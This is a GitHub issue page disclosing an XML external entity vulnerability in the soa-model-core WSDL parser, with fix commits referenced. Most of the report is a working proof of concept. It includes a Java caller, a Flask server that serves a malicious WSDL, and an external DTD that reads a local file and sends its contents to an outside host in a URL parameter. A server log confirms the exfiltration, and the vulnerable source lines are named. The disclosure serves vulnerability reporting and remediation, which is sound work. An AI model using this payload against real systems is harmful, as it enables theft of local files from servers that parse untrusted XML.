We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
There is an XXE vulnerability in parsing wsdl.
Add pom.xml the latest version of soa-model-core.
<!-- https://mvnrepository.com/artifact/com.predic8/soa-model-core --> <dependency> <groupId>com.predic8</groupId> <artifactId>soa-model-core</artifactId> <version>1.6.3</version> </dependency>
XXE vulnerability appeared when crawling remote wsdl file and parsing.
import com.predic8.wsdl.*; public class testxxe { public static void main(String[] args) { WSDLParser parser = new WSDLParser(); Definitions defs = parser.parse("http://ip:10000/testxxeService?wsdl"); } }
Construct server with evil wsdl file by flask
from flask import Flask, Response,request app = Flask(__name__) @app.route('/testxxeService', defaults={'path': ''}) def catch_all(path): global num xml = """<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY % dtd SYSTEM "http://ip:10000/data.dtd"> %dtd; ]> <data>&send;</data>""" return Response(xml, mimetype='text/xml',status=200) @app.route('/data.dtd', defaults={'path': ''}) def hello(path): global num xml = """<!ENTITY % file SYSTEM "file:///tmp/123"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip:10000/?filecontent=%file;'>"> %int; %send;""" return Response(xml, mimetype='text/xml',status=200) if __name__ == "__main__": app.run(host='0.0.0.0', port=10000)
Create a test file /tmp/123
$ echo 123123 > /tmp/123 $ cat /tmp/123 123123
Run java code and xxe attack successfully.
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /testxxeService?wsdl HTTP/1.1" 200 - 127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /data.dtd HTTP/1.1" 200 - 127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /?filecontent=123123 HTTP/1.1" 404 -
core/src/main/groovy/com/predic8/schema/Include.groovy line42 def incToken = XMLInputFactory.newInstance().createXMLStreamReader(resource) core/src/main/groovy/com/predic8/soamodel/AbstractParser.groovy line51: XMLInputFactory.newInstance().createXMLStreamReader(res)
Reference https://stackoverflow.com/questions/53934352/xmlstreamreader-inputstream-xxe-vulnerability-showing-up-in-checkmarx-report XMLInputFactory allow load DTD, so there is an xxe vulnerability.
The text was updated successfully, but these errors were encountered:
19de169
Fixes #281.
3aa295f
No branches or pull requests
There is an XXE vulnerability in parsing wsdl.
Add pom.xml the latest version of soa-model-core.
XXE vulnerability appeared when crawling remote wsdl file and parsing.
Construct server with evil wsdl file by flask
Create a test file /tmp/123
Run java code and xxe attack successfully.
Reference https://stackoverflow.com/questions/53934352/xmlstreamreader-inputstream-xxe-vulnerability-showing-up-in-checkmarx-report
XMLInputFactory allow load DTD, so there is an xxe vulnerability.
The text was updated successfully, but these errors were encountered: